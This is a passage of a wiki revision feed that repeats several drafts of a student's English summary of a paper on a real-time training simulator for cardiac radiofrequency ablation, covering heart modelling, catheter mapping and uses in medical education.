To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
The aim of the article is to introduce a system that can simulate a specific heart operation.&amp;lt;br&amp;gt; &lt;br /&gt;
The main contribution of the project is about helping the rookie cardiologist to improve their skills, by having them training on a system that can tell them if they have done some mistkaes. It present a new way of training, better than the old one (who was to train on a real patient, with the supervision of a senior cardiologist). Even if a real practice is always good, it's better to pratice first on a simulation program, which wont hurt anyone. &amp;lt;br&amp;gt; &lt;br /&gt;
The authors explain how every single part of the simulator work, and how they are connected to each other. They also show the results of the simulation, and point why and how the simulation is sometime worst than in an other time.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Applications ==&lt;br /&gt;
&lt;br /&gt;
We can think of many applications resulting for this simulator. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
The first one, which is the most obvious, is to introduce the simulator in medecine school, for students that wanted to be cardiologist in the future. With this simulator, in addition with training on a real heart, the students will be trained to the surgery, and even more, will be able to locate where they made mistakes, and then focus the next training to not remake the same mistakes, again. The software, wich gives a lot of feedback, will help them to improve their skills and abilities for surgery. &amp;lt;br&amp;gt; &lt;br /&gt;
But for me, it's also really important to practice in parrallel with a real heart. Indeed, the most efficient simulator with the best dedicated software will never be able to reproduce the exact same feeling and impressions that you feel when you are operating on a real heart. Even more, this operation on the simulator represents only the heart. A good improvement to this simulator will be to not only simulate the heart, but also the body around him, so that it represents the real conditions the surgeon is when he operates. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
We can also think of an application for others surgeries. This simulator only focus on electrocardiology procedures, but to do the same kind of simulator for other heart surgeries (or, even more, for other organ surgery) will be great for the students. &amp;lt;br&amp;gt; &lt;br /&gt;
The simulators offer a great perspective because of every possibilities that they have, they are harmless (unless you can hurt a computer ...) and also because they can be used an infinite time, whereas a real heart is made of flush, and flush always rot in the end. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32614</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32614"/>
				<updated>2016-06-19T13:30:08Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
The aim of the article is to introduce a system that can simulate a specific heart operation.&amp;lt;br&amp;gt; &lt;br /&gt;
The main contribution of the project is about helping the rookie cardiologist to improve their skills, by having them training on a system that can tell them if they have done some mistkaes. It present a new way of training, better than the old one (who was to train on a real patient, with the supervision of a senior cardiologist). Even if a real practice is always good, it's better to pratice first on a simulation program, which wont hurt anyone. &amp;lt;br&amp;gt; &lt;br /&gt;
The authors explain how every single part of the simulator work, and how they are connected to each other. They also show the results of the simulation, and point why and how the simulation is sometime worst than in an other time.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Applications ==&lt;br /&gt;
&lt;br /&gt;
We can think of many applications resulting for this simulator. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
The first one, which is the most obvious, is to introduce the simulator in medecine school, for students that wanted to be cardiologist in the future. With this simulator, in addition with training on a real heart, the students will be trained to the surgery, and even more, will be able to locate where they made mistakes, and then focus the next training to not remake the same mistakes, again. The software, wich gives a lot of feedback, will help them to improve their skills and abilities for surgery. &amp;lt;br&amp;gt; &lt;br /&gt;
But for me, it's also really important to practice in parrallel with a real heart. Indeed, the most efficient simulator with the best dedicated software will never be able to reproduce the exact same feeling and impressions that you feel when you are operating on a real heart. Even more, this operation on the simulator represents only the heart. A good improvement to this simulator will be to not only simulate the heart, but also the body around him, so that it represents the real conditions the surgeon is when he operates. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32519</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32519"/>
				<updated>2016-06-18T15:21:49Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Main contribution */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
The aim of the article is to introduce a system that can simulate a specific heart operation.&amp;lt;br&amp;gt; &lt;br /&gt;
The main contribution of the project is about helping the rookie cardiologist to improve their skills, by having them training on a system that can tell them if they have done some mistkaes. It present a new way of training, better than the old one (who was to train on a real patient, with the supervision of a senior cardiologist). Even if a real practice is always good, it's better to pratice first on a simulation program, which wont hurt anyone. &amp;lt;br&amp;gt; &lt;br /&gt;
The authors explain how every single part of the simulator work, and how they are connected to each other. They also show the results of the simulation, and point why and how the simulation is sometime worst than in an other time.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32518</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32518"/>
				<updated>2016-06-18T15:17:31Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Main contribution */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
The aim of the article is to introduce a system that can simulate a specific heart operation.&amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of the project is about helping the rookie cardiologist to improve their skills, by having them training on a system that can tell them if they have done some mistkaes. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
The authors explain how every single part of the simulator work, and how they are connected to each other. They also show the results of the simulation, and point why and how the simulation is sometime worst than in an other time.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32503</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32503"/>
				<updated>2016-06-18T12:48:15Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32502</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32502"/>
				<updated>2016-06-18T12:48:00Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32501</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32501"/>
				<updated>2016-06-18T12:47:32Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
